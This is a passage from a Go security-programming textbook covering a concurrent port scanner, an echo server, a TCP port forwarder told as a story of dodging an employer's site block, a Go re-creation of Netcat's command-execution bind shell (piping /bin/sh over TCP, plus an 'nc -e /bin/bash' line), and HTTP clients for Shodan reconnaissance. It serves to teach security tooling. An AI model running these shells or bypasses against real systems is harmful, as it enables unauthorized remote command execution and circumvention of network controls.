the scanner wouldn’t check them in order. To solve this problem, you need to use a separate thread to pass the result of the port scan back to your main thread to order the ports before printing. Another benefit of this modification is that you can remove the dependency of a WaitGroup entirely, as you’ll have another method of tracking completion. For example, if you scan 1024 ports, you’re sending on the worker channel 1024 times, and you’ll need to send the result of that work back to the main thread 1024 times. Because the number of work units sent and the number of results received are the same, your program can know when to close the channels and subsequently shut down the workers. This modification is demonstrated in Listing 2-8, which completes the port scanner. package main import ( "fmt" "net" "sort" ) u func worker(ports, results chan int) { for p := range ports { address := fmt.Sprintf("scanme.nmap.org:%d", p) conn, err := net.Dial("tcp", address) if err != nil { v results <- 0 continue } conn.Close() w results <- p } } 前沿信安资讯阵地 公众号:i nf osrc TCP, Scanners, and Proxies 31 func main() { ports := make(chan int, 100) x results := make(chan int) y var openports []int for i := 0; i < cap(ports); i++ { go worker(ports, results) } z go func() { for i := 1; i <= 1024; i++ { ports <- i } }() { for i := 0; i < 1024; i++ { port := <-results if port != 0 { openports = append(openports, port) } } close(ports) close(results) | sort.Ints(openports) for _, port := range openports { fmt.Printf("%d open\n", port) } } Listing 2-8: Port scanning with multiple channels (/ch-2/tcp-scanner-final/main.go) The worker(ports, results chan int) function has been modified to accept two channels u; the remaining logic is mostly the same, except that if the port is closed, you’ll send a zero v, and if it’s open, you’ll send the port w. Also, you create a separate channel to communicate the results from the worker to the main thread x. You then use a slice y to store the results so you can sort them later. Next, you need to send to the workers in a separate goroutine z because the result-gathering loop needs to start before more than 100 items of work can continue. The result-gathering loop { receives on the results channel 1024 times. If the port doesn’t equal 0, it’s appended to the slice. After closing the chan- nels, you’ll use sort | to sort the slice of open ports. All that’s left is to loop over the slice and print the open ports to screen. There you have it: a highly efficient port scanner. Take some time to play around with the code—specifically, the number of workers. The higher the count, the faster your program should execute. But if you add too many workers, your results could become unreliable. When you’re writing tools for others to use, you’ll want to use a healthy default value that caters to reliability over speed. However, you should also allow users to provide the number of workers as an option. 前沿信安资讯阵地 公众号:i nf osrc 32 Chapter 2 You could make a couple of improvements to this program. First, you’re sending on the results channel for every port scanned, and this isn’t neces- sary. The alternative requires code that is slightly more complex as it uses an additional channel not only to track the workers, but also to prevent a race condition by ensuring the completion of all gathered results. As this is an introductory chapter, we purposefully left this out; but don’t worry! We’ll introduce this pattern in Chapter 3. Second, you might want your scanner to be able to parse port-strings—for example, 80,443,8080,21-25, like those that can be passed to Nmap. If you want to see an implementation of this, see https://github.com/blackhat-go/bhg/blob/master/ch-2/scanner-port-format/. We’ll leave this as an exercise for you to explore. Building a TCP Proxy You can achieve all TCP-based communications by using Go’s built-in net package. The previous section focused primarily on using the net package from a client’s perspective, and this section will use it to create TCP servers and transfer data. You’ll begin this journey by building the requisite echo server—a server that merely echoes a given response back to a client— followed by two much more generally applicable programs: a TCP port forwarder and a re-creation of Netcat’s “gaping security hole” for remote command execution. Using io.Reader and io.Writer To create the examples in this section, you need to use two significant types that are crucial to essentially all input/output (I/O) tasks, whether you’re using TCP, HTTP, a filesystem, or any other means: io.Reader and io.Writer. Part of Go’s built-in io package, these types act as the cornerstone to any data transmission, local or networked. These types are defined in Go’s documentation as follows: type Reader interface { Read(p []byte) (n int, err error) } type Writer interface { Write(p []byte) (n int, err error) } Both types are defined as interfaces, meaning they can’t be directly instantiated. Each type contains the definition of a single exported function: Read or Write. As explained in Chapter 1, you can think of these functions as abstract methods that must be implemented on a type for it to be considered a Reader or Writer. For example, the following contrived type fulfills this contract and can be used anywhere a Reader is accepted: type FooReader struct {} func (fooReader *FooReader) Read(p []byte) (int, error) { // Read some data from somewhere, anywhere. 前沿信安资讯阵地 公众号:i nf osrc TCP, Scanners, and Proxies 33 return len(dataReadFromSomewhere), nil } This same idea applies to the Writer interface: type FooWriter struct {} func (fooWriter *FooWriter) Write(p []byte) (int, error) { // Write data somewhere. return len(dataWrittenSomewhere), nil } Let’s take this knowledge and create something semi-usable: a custom Reader and Writer that wraps stdin and stdout. The code for this is a little contrived since Go’s os.Stdin and os.Stdout types already act as Reader and Writer, but then you wouldn’t learn anything if you didn’t reinvent the wheel every now and again, would you? Listing 2-9 shows a full implementation, and an explanation follows. package main import ( "fmt" "log" "os" ) // FooReader defines an io.Reader to read from stdin. u type FooReader struct{} // Read reads data from stdin. v func (fooReader *FooReader) Read(b []byte) (int, error) { fmt.Print("in > ") return os.Stdin.Read(b)w } // FooWriter defines an io.Writer to write to Stdout. x type FooWriter struct{} // Write writes data to Stdout. y func (fooWriter *FooWriter) Write(b []byte) (int, error) { fmt.Print("out> ") return os.Stdout.Write(b)z } func main() { // Instantiate reader and writer. var ( reader FooReader writer FooWriter ) // Create buffer to hold input/output. { input := make([]byte, 4096) 前沿信安资讯阵地 公众号:i nf osrc 34 Chapter 2 // Use reader to read input. s, err := reader.Read(input)| if err != nil { log.Fatalln("Unable to read data") } fmt.Printf("Read %d bytes from stdin\n", s) // Use writer to write output. s, err = writer.Write(input)} if err != nil { log.Fatalln("Unable to write data") } fmt.Printf("Wrote %d bytes to stdout\n", s) } Listing 2-9: A reader and writer demonstration (/ch-2/io-example/main.go) The code defines two custom types: FooReader u and FooWriter x. On each type, you define a concrete implementation of the Read([]byte) func- tion v for FooReader and the Write([]byte) function y for FooWriter. In this case, both functions are reading from stdin w and writing to stdout z. Note that the Read functions on both FooReader and os.Stdin return the length of data and any errors. The data itself is copied into the byte slice passed to the function. This is consistent with the Reader interface prototype definition provided earlier in this section. The main() function creates that slice (named input) { and then proceeds to use it in calls to FooReader.Read([]byte) | and FooReader.Write([]byte) }. A sample run of the program produces the following: $ go run main.go in > hello world!!! Read 15 bytes from stdin out> hello world!!! Wrote 4096 bytes to stdout Copying data from a Reader to a Writer is a fairly common pattern—so much so that Go’s io package contains a Copy() function that can be used to simplify the main() function. The function prototype is as follows: func Copy(dst io.Writer, src io.Reader) (written int64, error) This convenience function allows you to achieve the same program- matic behavior as before, replacing your main() function with the code in Listing 2-10. func main() { var ( reader FooReader writer FooWriter ) 前沿信安资讯阵地 公众号:i nf osrc TCP, Scanners, and Proxies 35 if _, err := io.Copy(&writer, &reader)u; err != nil { log.Fatalln("Unable to read/write data") } } Listing 2-10: Using io.Copy (/ch-2/copy-example/main.go) Notice that the explicit calls to reader.Read([]byte) and writer.Write([] byte) have been replaced with a single call to io.Copy(writer, reader) u. Under the covers, io.Copy(writer, reader) calls the Read([]byte) function on the provided reader, triggering the FooReader to read from stdin. Subsequently, io.Copy(writer, reader) calls the Write([]byte) function on the provided writer, resulting in a call to your FooWriter, which writes the data to stdout. Essentially, io.Copy(writer, reader) handles the sequential read-then-write process without all the petty details. This introductory section is by no means a comprehensive look at Go’s I/O and interfaces. Many convenience functions and custom readers and writers exist as part of the standard Go packages. In most cases, Go’s stan- dard packages contain all the basic implementations to achieve the most common tasks. In the next section, let’s explore how to apply these funda- mentals to TCP communications, eventually using the power vested in you to develop real-life, usable tools. Creating the Echo Server As is customary for most languages, you’ll start by building an echo server to learn how to read and write data to and from a socket. To do this, you’ll use net.Conn, Go’s stream-oriented network connection, which we introduced when you built a port scanner. Based on Go’s documentation for the data type, Conn implements the Read([]byte) and Write([]byte) functions as defined for the Reader and Writer interfaces. Therefore, Conn is both a Reader and a Writer (yes, this is possible). This makes sense logically, as TCP connections are bidirectional and can be used to send (write) or receive (read) data. After creating an instance of Conn, you’ll be able to send and receive data over a TCP socket. However, a TCP server can’t simply manufacture a connection; a client must establish a connection. In Go, you can use net.Listen(network, address string) to first open a TCP listener on a specific port. Once a client connects, the Accept() method creates and returns a Conn object that you can use for receiving and sending data. Listing 2-11 shows a complete example of a server implementation. We’ve included comments inline for clarity. Don’t worry about understand- ing the code in its entirety, as we’ll break it down momentarily. package main import ( "log" "net" ) 前沿信安资讯阵地 公众号:i nf osrc 36 Chapter 2 // echo is a handler function that simply echoes received data. func echo(conn net.Conn) { defer conn.Close() // Create a buffer to store received data. b := make([]byte, 512) u for { // Receive data via conn.Read into a buffer. size, err := conn.Readv(b[0:]) if err == io.EOF { log.Println("Client disconnected") break } if err != nil { log.Println("Unexpected error") break } log.Printf("Received %d bytes: %s\n", size, string(b)) // Send data via conn.Write. log.Println("Writing data") if _, err := conn.Writew(b[0:size]); err != nil { log.Fatalln("Unable to write data") } } } func main() { // Bind to TCP port 20080 on all interfaces. x listener, err := net.Listen("tcp", ":20080") if err != nil { log.Fatalln("Unable to bind to port") } log.Println("Listening on") y for { // Wait for connection. Create net.Conn on connection established. z conn, err := listener.Accept() log.Println("Received connection") if err != nil { log.Fatalln("Unable to accept connection") } // Handle the connection. Using goroutine for concurrency. { go echo(conn) } } Listing 2-11: A basic echo server (/ch-2/echo-server /main.go) Listing 2-11 begins by defining a function named echo(net.Conn), which accepts a Conn instance as a parameter. It behaves as a connection handler to perform all necessary I/O. The function loops indefinitely u, using a buffer to read v and write w data from and to the connection. The data is read into a variable named b and subsequently written back on the connection. 前沿信安资讯阵地 公众号:i nf osrc TCP, Scanners, and Proxies 37 Now you need to set up a listener that will call your handler. As men- tioned previously, a server can’t manufacture a connection but must instead listen for a client to connect. Therefore, a listener, defined as tcp bound to port 20080, is started on all interfaces by using the net.Listen(network, address string) function x. Next, an infinite loop y ensures that the server will continue to listen for connections even after one has been received. Within this loop, you call listener.Accept() z, a function that blocks execution as it awaits client connections. When a client connects, this function returns a Conn instance. Recall from earlier discussions in this section that Conn is both a Reader and a Writer (it implements the Read([]byte) and Write([]byte) interface methods). The Conn instance is then passed to the echo(net.Conn) handler func- tion {. This call is prefaced with the go keyword, making it a concurrent call so that other connections don’t block while waiting for the handler function to complete. This is likely overkill for such a simple server, but we’ve included it again to demonstrate the simplicity of Go’s concurrency pattern, in case it wasn’t already clear. At this point, you have two light- weight threads running concurrently: • The main thread loops back and blocks on listener.Accept() while it awaits another connection. • The handler goroutine, whose execution has been transferred to the echo(net.Conn) function, proceeds to run, processing the data. The following shows an example using Telnet as the connecting client: $ telnet localhost 20080 Trying Connected to localhost. Escape character is '^]'. test of the echo server test of the echo server The server produces the following standard output: $ go run main.go 2020/01/01 06:22:09 Listening on 2020/01/01 06:22:14 Received connection 2020/01/01 06:22:18 Received 25 bytes: test of the echo server 2020/01/01 06:22:18 Writing data Revolutionary, right? A server that repeats back to the client exactly what the client sent to the server. What a useful and exciting example! It’s quite a time to be alive. Improving the Code by Creating a Buffered Listener The example in Listing 2-11 works perfectly fine but relies on fairly low-level function calls, buffer tracking, and iterative reads/writes. This is a some- what tedious, error-prone process. Fortunately, Go contains other packages 前沿信安资讯阵地 公众号:i nf osrc 38 Chapter 2 that can simplify this process and reduce the complexity of the code. Specifically, the bufio package wraps Reader and Writer to create a buffered I/O mechanism. The updated echo(net.Conn) function is detailed here, and an explanation of the changes follows: func echo(conn net.Conn) { defer conn.Close() u reader := bufio.NewReader(conn) s, err := reader.ReadString('\n')v if err != nil { log.Fatalln("Unable to read data") } log.Printf("Read %d bytes: %s", len(s), s) log.Println("Writing data") w writer := bufio.NewWriter(conn) if _, err := writer.WriteString(s)x; err != nil { log.Fatalln("Unable to write data") } y writer.Flush() } No longer are you directly calling the Read([]byte) and Write([]byte) functions on the Conn instance; instead, you’re initializing a new buffered Reader and Writer via NewReader(io.Reader) u and NewWriter(io.Writer) w. These calls both take, as a parameter, an existing Reader and Writer (remember, the Conn type implements the necessary functions to be considered both a Reader and a Writer). Both buffered instances contain complementary functions for read- ing and writing string data. ReadString(byte) v takes a delimiter character used to denote how far to read, whereas WriteString(byte) x writes the string to the socket. When writing data, you need to explicitly call writer .Flush() y to flush write all the data to the underlying writer (in this case, a Conn instance). Although the previous example simplifies the process by using buff- ered I/O, you can reframe it to use the Copy(Writer, Reader) convenience function. Recall that this function takes as input a destination Writer and a source Reader, simply copying from source to destination. In this example, you’ll pass the conn variable as both the source and destination because you’ll be echoing the contents back on the established connection: func echo(conn net.Conn) { defer conn.Close() // Copy data from io.Reader to io.Writer via io.Copy(). if _, err := io.Copy(conn, conn); err != nil { log.Fatalln("Unable to read/write data") } } 前沿信安资讯阵地 公众号:i nf osrc TCP, Scanners, and Proxies 39 You’ve explored the basics of I/O and applied it to TCP servers. Now it’s time to move on to more usable, relevant examples. Proxying a TCP Client Now that you have a solid foundation, you can take what you’ve learned up to this point and create a simple port forwarder to proxy a connection through an intermediary service or host. As mentioned earlier in this chapter, this is useful for trying to circumvent restrictive egress controls or to leverage a system to bypass network segmentation. Before laying out the code, consider this imaginary but realistic prob- lem: Joe is an underperforming employee who works for ACME Inc. as a business analyst making a handsome salary based on slight exaggerations he included on his resume. (Did he really go to an Ivy League school? Joe, that’s not very ethical.) Joe’s lack of motivation is matched only by his love for cats—so much so that Joe installed cat cameras at home and hosted a site, joescatcam.website, through which he could remotely monitor the dan- der-filled fluff bags. One problem, though: ACME is onto Joe. They don’t like that he’s streaming his cat cam 24/7 in 4K ultra high-def, using valu- able ACME network bandwidth. ACME has even blocked its employees from visiting Joe’s cat cam website. Joe has an idea. “What if I set up a port-forwarder on an internet- based system I control,” Joe says, “and force the redirection of all traffic from that host to joescatcam.website?” Joe checks at work the following day and confirms he can access his personal website, hosted at the joesproxy.com domain. Joe skips his afternoon meetings, heads to a coffee shop, and quickly codes a solution to his problem. He’ll forward all traffic received at http://joesproxy.com to http://joescatcam.website. Here’s Joe’s code, which he runs on the joesproxy.com server: func handle(src net.Conn) { dst, err := net.Dial("tcp", "joescatcam.website:80")u if err != nil { log.Fatalln("Unable to connect to our unreachable host") } defer dst.Close() // Run in goroutine to prevent io.Copy from blocking v go func() { // Copy our source's output to the destination if _, err := io.Copy(dst, src)w; err != nil { log.Fatalln(err) } }() // Copy our destination's output back to our source if _, err := io.Copy(src, dst)x; err != nil { log.Fatalln(err) } } 前沿信安资讯阵地 公众号:i nf osrc 40 Chapter 2 func main() { // Listen on local port 80 listener, err := net.Listen("tcp", ":80") if err != nil { log.Fatalln("Unable to bind to port") } for { conn, err := listener.Accept() if err != nil { log.Fatalln("Unable to accept connection") } go handle(conn) } } Start by examining Joe’s handle(net.Conn) function. Joe connects to joescatcam.website u (recall that this unreachable host isn’t directly accessible from Joe’s corporate workstation). Joe then uses Copy(Writer, Reader) two separate times. The first instance w ensures that data from the inbound connection is copied to the joescatcam.website connection. The second instance x ensures that data read from joescatcam.website is written back to the connecting client’s connection. Because Copy(Writer, Reader) is a blocking function, and will continue to block execution until the network connection is closed, Joe wisely wraps his first call to Copy(Writer, Reader) in a new goroutine v. This ensures that execution within the handle(net.Conn) function continues, and the second Copy(Writer, Reader) call can be made. Joe’s proxy listens on port 80 and relays any traffic received from a connection to and from port 80 on joescatcam.website. Joe, that crazy and wasteful man, confirms that he can connect to joescatcam.website via joesproxy.com by connecting with curl: $ curl -i -X GET http://joesproxy.com HTTP/1.1 200 OK Date: Wed, 25 Nov 2020 19:51:54 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Thu, 27 Jun 2019 15:30:43 GMT ETag: "6d-519594e7f2d25" Accept-Ranges: bytes Content-Length: 109 Vary: Accept-Encoding Content-Type: text/html --snip-- At this point, Joe has done it. He’s living the dream, wasting ACME- sponsored time and network bandwidth while he watches his cats. Today, there will be cats! Replicating Netcat for Command Execution In this section, let’s replicate some of Netcat’s more interesting functionality— specifically, its gaping security hole. 前沿信安资讯阵地 公众号:i nf osrc TCP, Scanners, and Proxies 41 Netcat is the TCP/IP Swiss Army knife—essentially, a more flexible, scriptable version of Telnet. It contains a feature that allows stdin and stdout of any arbitrary program to be redirected over TCP, enabling an attacker to, for example, turn a single command execution vulnerability into operating system shell access. Consider the following: $ nc –lp 13337 –e /bin/bash This command creates a listening server on port 13337. Any remote client that connects, perhaps via Telnet, would be able to execute arbitrary bash commands—hence the reason this is referred to as a gaping security hole. Netcat allows you to optionally include this feature during program compilation. (For good reason, most Netcat binaries you’ll find on standard Linux builds do not include this feature.) It’s dangerous enough that we’ll show you how to create it in Go! First, look at Go’s os/exec package. You’ll use that for running oper- ating system commands. This package defines a type, Cmd, that contains necessary methods and properties to run commands and manipulate stdin and stdout. You’ll redirect stdin (a Reader) and stdout (a Writer) to a Conn instance (which is both a Reader and a Writer). When you receive a new connection, you can use the Command(name string, arg ...string) function from os/exec to create a new Cmd instance. This function takes as parameters the operating system command and any arguments. In this example, hardcode /bin/sh as the command and pass -i as an argument such that you’re in interactive mode, which allows you to manipulate stdin and stdout more reliably: cmd := exec.Command("/bin/sh", "-i") This creates an instance of Cmd but doesn’t yet execute the command. You have a couple of options for manipulating stdin and stdout. You could use Copy(Writer, Reader) as discussed previously, or directly assign Reader and Writer to Cmd. Let’s directly assign your Conn object to both cmd.Stdin and cmd.Stdout, like so: cmd.Stdin = conn cmd.Stdout = conn With the setup of the command and the streams complete, you run the command by using cmd.Run(): if err := cmd.Run(); err != nil { // Handle error. } This logic works perfectly fine on Linux systems. However, when tweaking and running the program on a Windows system, running cmd.exe instead of /bin/bash, you’ll find that the connecting client never receives the 前沿信安资讯阵地 公众号:i nf osrc 42 Chapter 2 command output because of some Windows-specific handling of anony- mous pipes. Here are two solutions for this problem. First, you can tweak the code to explicitly force the flushing of stdout to correct this nuance. Instead of assigning Conn directly to cmd.Stdout, you imple- ment a custom Writer that wraps bufio.Writer (a buffered writer) and explicitly calls its Flush method to force the buffer to be flushed. Refer to the “Creating the Echo Server” on page 35 for an exemplary use of bufio.Writer. Here’s the definition of the custom writer, Flusher: // Flusher wraps bufio.Writer, explicitly flushing on all writes. type Flusher struct { w *bufio.Writer } // NewFlusher creates a new Flusher from an io.Writer. func NewFlusher(w io.Writer) *Flusher { return &Flusher{ w: bufio.NewWriter(w), } } // Write writes bytes and explicitly flushes buffer. u func (foo *Flusher) Write(b []byte) (int, error) { count, err := foo.w.Write(b)v if err != nil { return -1, err } if err := foo.w.Flush()w; err != nil { return -1, err } return count, err } The Flusher type implements a Write([]byte) function u that writes v the data to the underlying buffered writer and then flushes w the output. With the implementation of a custom writer, you can tweak the connec- tion handler to instantiate and use this Flusher custom type for cmd.Stdout: func handle(conn net.Conn) { // Explicitly calling /bin/sh and using -i for interactive mode // so that we can use it for stdin and stdout. // For Windows use exec.Command("cmd.exe"). cmd := exec.Command("/bin/sh", "-i") // Set stdin to our connection cmd.Stdin = conn // Create a Flusher from the connection to use for stdout. // This ensures stdout is flushed adequately and sent via net.Conn. cmd.Stdout = NewFlusher(conn) // Run the command. if err := cmd.Run(); err != nil { 前沿信安资讯阵地 公众号:i nf osrc TCP, Scanners, and Proxies 43 log.Fatalln(err) } } This solution, while adequate, certainly isn’t elegant. Although working code is more important than elegant code, we’ll use this problem as an opportunity to introduce the io.Pipe() function, Go’s synchronous, in-memory pipe that can be used for connecting Readers and Writers: func Pipe() (*PipeReader, *PipeWriter) Using PipeReader and PipeWriter allows you to avoid having to explicitly flush the writer and synchronously connect stdout and the TCP connection. You will, yet again, rewrite the handler function: func handle(conn net.Conn) { // Explicitly calling /bin/sh and using -i for interactive mode // so that we can use it for stdin and stdout. // For Windows use exec.Command("cmd.exe"). cmd := exec.Command("/bin/sh", "-i") // Set stdin to our connection rp, wp := io.Pipe()u cmd.Stdin = conn v cmd.Stdout = wp w go io.Copy(conn, rp) cmd.Run() conn.Close() } The call to io.Pipe() u creates both a reader and a writer that are synchronously connected—any data written to the writer (wp in this exam- ple) will be read by the reader (rp). So, you assign the writer to cmd.Stdout v and then use io.Copy(conn, rp) w to link the PipeReader to the TCP con- nection. You do this by using a goroutine to prevent the code from block- ing. Any standard output from the command gets sent to the writer and then subsequently piped to the reader and out over the TCP connection. How’s that for elegant? With that, you’ve successfully implemented Netcat’s gaping security hole from the perspective of a TCP listener awaiting a connection. You can use similar logic to implement the feature from the perspective of a con- necting client redirecting stdout and stdin of a local binary to a remote listener. The precise details are left to you to determine, but would likely include the following: • Establish a connection to a remote listener via net.Dial(network, address string). • Initialize a Cmd via exec.Command(name string, arg ...string). • Redirect Stdin and Stdout properties to utilize the net.Conn object. • Run the command. 前沿信安资讯阵地 公众号:i nf osrc 44 Chapter 2 At this point, the listener should receive a connection. Any data sent to the client should be interpreted as stdin on the client, and any data received on the listener should be interpreted as stdout. The full code of this example is available at https://github.com/blackhat-go/bhg/blob/master/ch-2 /netcat-exec/main.go. Summary Now that you’ve explored practical applications and usage of Go as it relates to networking, I/O, and concurrency, let’s move on to creating usable HTTP clients. 前沿信安资讯阵地 公众号:i nf osrc In Chapter 2, you learned how to harness the power of TCP with various techniques for creating usable clients and servers. This is the first in a series of chapters that explores a variety of protocols on higher layers of the OSI model. Because of its prevalence on networks, its affiliation with relaxed egress controls, and its general flexibility, let’s begin with HTTP. This chapter focuses on the client side. It will first introduce you to the basics of building and customizing HTTP requests and receiving their responses. Then you’ll learn how to parse structured response data so the client can interrogate the information to determine actionable or relevant data. Finally, you’ll learn how to apply these fundamentals by building HTTP clients that interact with a variety of security tools and resources. The clients you develop will query and consume the APIs of Shodan, Bing, and Metasploit and will search and parse document metadata in a manner similar to the metadata search tool FOCA. 3 H T T P CL IE N T S A N D R E MO T E IN T E R AC T ION W I T H T OOL S 前沿信安资讯阵地 公众号:i nf osrc 46 Chapter 3 HTTP Fundamentals with Go Although you don’t need a comprehensive understanding of HTTP, you should know some fundamentals before you get started. First, HTTP is a stateless protocol: the server doesn’t inherently maintain state and status for each request. Instead, state is tracked through a variety of means, which may include session identifiers, cookies, HTTP headers, and more. The client and servers have a responsibility to properly negotiate and validate this state. Second, communications between clients and servers can occur either synchronously or asynchronously, but they operate on a request/response cycle. You can include several options and headers in the request in order to influence the behavior of the server and to create usable web applica- tions. Most commonly, servers host files that a web browser renders to pro- duce a graphical, organized, and stylish representation of the data. But the endpoint can serve arbitrary data types. APIs commonly communicate via more structured data encoding, such as XML, JSON, or MSGRPC. In some cases, the data retrieved may be in binary format, representing an arbitrary file type for download. Finally, Go contains convenience functions so you can quickly and eas- ily build and send HTTP requests to a server and subsequently retrieve and process the response. Through some of the mechanisms you’ve learned in previous chapters, you’ll find that the conventions for handling structured data prove extremely convenient when interacting with HTTP APIs. Calling HTTP APIs Let’s begin the HTTP discussion by examining basic requests. Go’s net/http standard package contains several convenience functions to quickly and easily send POST, GET, and HEAD requests, which are arguably the most common HTTP verbs you’ll use. These functions take the following forms: Get(url string) (resp *Response, err error) Head(url string) (resp *Response, err error) Post(url string, bodyType string, body io.Reader) (resp *Response, err error) Each function takes—as a parameter—the URL as a string value and uses it for the request’s destination. The Post() function is slightly more complex than the Get() and Head() functions. Post() takes two additional parameters: bodyType, which is a string value that you use for the Content- Type HTTP header (commonly application/x-www-form-urlencoded) of the request body, and an io.Reader, which you learned about in Chapter 2. You can see a sample implementation of each of these functions in Listing 3-1. (All the code listings at the root location of / exist under the provided github repo https://github.com/blackhat-go/bhg/.) Note that the POST request creates the request body from form values and sets the 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 47 Content-Type header. In each case, you must close the response body after you’re done reading data from it. r1, err := http.Get("http://www.google.com/robots.txt") // Read response body. Not shown. defer r1.Body.Close() r2, err := http.Head("http://www.google.com/robots.txt") // Read response body. Not shown. defer r2.Body.Close() form := url.Values{} form.Add("foo", "bar") r3, err = http.Postu( "https://www.google.com/robots.txt", v "application/x-www-form-urlencoded", strings.NewReader(form.Encode()w), ) // Read response body. Not shown. defer r3.Body.Close() Listing 3-1: Sample implementations of the Get(), Head(), and Post() functions (/ch-3/basic/main.go) The POST function call u follows the fairly common pattern of setting the Content-Type to application/x-www-form-urlencoded v, while URL-encoding form data w. Go has an additional POST request convenience function, called PostForm(), which removes the tediousness of setting those values and manually encoding every request; you can see its syntax here: func PostForm(url string, data url.Values) (resp *Response, err error) If you want to substitute the PostForm() function for the Post() implemen- tation in Listing 3-1, you use something like the bold code in Listing 3-2. form := url.Values{} form.Add("foo", "bar") r3, err := http.PostForm("https://www.google.com/robots.txt", form) // Read response body and close. Listing 3-2: Using the PostForm() function instead of Post() (/ch-3/basic/main.go) Unfortunately, no convenience functions exist for other HTTP verbs, such as PATCH, PUT, or DELETE. You’ll use these verbs mostly to interact with RESTful APIs, which employ general guidelines on how and why a server should use them; but nothing is set in stone, and HTTP is like the Old West when it comes to verbs. In fact, we’ve often toyed with the idea of creating a new web framework that exclusively uses DELETE for everything. we’d call it DELETE.js, and it would be a top hit on Hacker News for sure. By reading this, you’re agreeing not to steal this idea! 前沿信安资讯阵地 公众号:i nf osrc 48 Chapter 3 Generating a Request To generate a request with one of these verbs, you can use the NewRequest() function to create the Request struct, which you’ll subsequently send using the Client function’s Do() method. We promise that it’s simpler than it sounds. The function prototype for http.NewRequest() is as follows: func NewRequest(umethod, vurl string, wbody io.Reader) (req *Request, err error) You need to supply the HTTP verb u and destination URL v to NewRequest() as the first two string parameters. Much like the first POST example in Listing 3-1, you can optionally supply the request body by passing in an io.Reader as the third and final parameter w. Listing 3-3 shows a call without an HTTP body—a DELETE request. req, err := http.NewRequest("DELETE", "https://www.google.com/robots.txt", nil) var client http.Client resp, err := client.Do(req) // Read response body and close. Listing 3-3: Sending a DELETE request (/ch-3/basic /main.go) Now, Listing 3-4 shows a PUT request with an io.Reader body (a PATCH request looks similar). form := url.Values{} form.Add("foo", "bar") var client http.Client req, err := http.NewRequest( "PUT", "https://www.google.com/robots.txt", strings.NewReader(form.Encode()), ) resp, err := client.Do(req) // Read response body and close. Listing 3-4: Sending a PUT request (/ch-3/basic /main.go) The standard Go net/http library contains several functions that you can use to manipulate the request before it’s sent to the server. You’ll learn some of the more relevant and applicable variants as you work through practical examples throughout this chapter. But first, we’ll show you how to do something meaningful with the HTTP response that the server receives. Using Structured Response Parsing In the previous section, you learned the mechanisms for building and send- ing HTTP requests in Go. Each of those examples glossed over response handling, essentially ignoring it for the time being. But inspecting various 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 49 components of the HTTP response is a crucial aspect of any HTTP-related task, like reading the response body, accessing cookies and headers, or simply inspecting the HTTP status code. Listing 3-5 refines the GET request in Listing 3-1 to display the status code and response body—in this case, Google’s robots.txt file. It uses the ioutil.ReadAll() function to read data from the response body, does some error checking, and prints the HTTP status code and response body to stdout. u resp, err := http.Get("https://www.google.com/robots.txt") if err != nil { log.Panicln(err) } // Print HTTP Status fmt.Println(resp.Statusv) // Read and display response body body, err := ioutil.ReadAll(resp.Bodyw) if err != nil { log.Panicln(err) } fmt.Println(string(body)) x resp.Body.Close() Listing 3-5: Processing the HTTP response body (/ch-3/basic/main.go) Once you receive your response, named resp u in the above code, you can retrieve the status string (for example, 200 OK) by accessing the exported Status parameter v; not shown in our example, there is a similar StatusCode parameter that accesses only the integer portion of the status string. The Response type contains an exported Body parameter w, which is of type io.ReadCloser. An io.ReadCloser is an interface that acts as an io.Reader as well as an io.Closer, or an interface that requires the implementation of a Close() function to close the reader and perform any cleanup. The details are somewhat inconsequential; just know that after reading the data from an io.ReadCloser, you’ll need to call the Close() function x on the response body. Using defer to close the response body is a common practice; this will ensure that the body is closed before you return it. Now, run the script to see the error status and response body: $ go run main.go 200 OK User-agent: * Disallow: /search Allow: /search/about Disallow: /sdch Disallow: /groups Disallow: /index.html? Disallow: /? Allow: /?hl= 前沿信安资讯阵地 公众号:i nf osrc 50 Chapter 3 Disallow: /?hl=*& Allow: /?hl=*&gws_rd=ssl$ Disallow: /?hl=*&*&gws_rd=ssl --snip-- If you encounter a need to parse more structured data—and it’s likely that you will—you can read the response body and decode it by using the conventions presented in Chapter 2. For example, imagine you’re interact- ing with an API that communicates using JSON, and one endpoint—say, /ping—returns the following response indicating the server state: {"Message":"All is good with the world","Status":"Success"} You can interact with this endpoint and decode the JSON message by using the program in Listing 3-6. package main import { encoding/json" log net/http } u type Status struct { Message string Status string } func main() { v res, err := http.Post( "http://IP:PORT/ping", "application/json", nil, ) if err != nil { log.Fatalln(err) } var status Status w if err := json.NewDecoder(res.Body).Decode(&status); err != nil { log.Fatalln(err) } defer res.Body.Close() log.Printf("%s -> %s\n", status.Statusx, status.Messagey) } Listing 3-6: Decoding a JSON response body (/ch-3/basic-parsing/main.go) The code begins by defining a struct called Status u, which contains the expected elements from the server response. The main() function first sends the POST request v and then decodes the response body w. After 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 51 doing so, you can query the Status struct as you normally would—by access- ing exported data types Status x and Message y. This process of parsing structured data types is consistent across other encoding formats, like XML or even binary representations. You begin the process by defining a struct to represent the expected response data and then decoding the data into that struct. The details and actual implementa- tion of parsing other formats will be left up to you to determine. The next sections will apply these fundamental concepts to assist you in building tools to interact with third-party APIs for the purpose of enhanc- ing adversarial techniques and reconnaissance. Building an HTTP Client That Interacts with Shodan Prior to performing any authorized adversarial activities against an orga- nization, any good attacker begins with reconnaissance. Typically, this starts with passive techniques that don’t send packets to the target; that way, detection of the activity is next to impossible. Attackers use a variety of sources and services—including social networks, public records, and search engines—to gain potentially useful information about the target. It’s absolutely incredible how seemingly benign information becomes critical when environmental context is applied during a chained attack scenario. For example, a web application that discloses verbose error messages may, alone, be considered low severity. However, if the error messages disclose the enterprise username format, and if the organization uses single-factor authentication for its VPN, those error messages could increase the likelihood of an internal network compromise through password-guessing attacks. Maintaining a low profile while gathering the information ensures that the target’s awareness and security posture remains neutral, increasing the likelihood that your attack will be successful. Shodan (https://www.shodan.io/), self-described as “the world’s first search engine for internet-connected devices,” facilitates passive reconnaissance by maintaining a searchable database of networked devices and services, includ- ing metadata such as product names, versions, locale, and more. Think of Shodan as a repository of scan data, even if it does much, much more. Reviewing the Steps for Building an API Client In the next few sections, you’ll build an HTTP client that interacts with the Shodan API, parsing the results and displaying relevant information. First, you’ll need a Shodan API key, which you get after you register on Shodan’s website. At the time of this writing, the fee is fairly nominal for the lowest tier, which offers adequate credits for individual use, so go sign up for that. Shodan 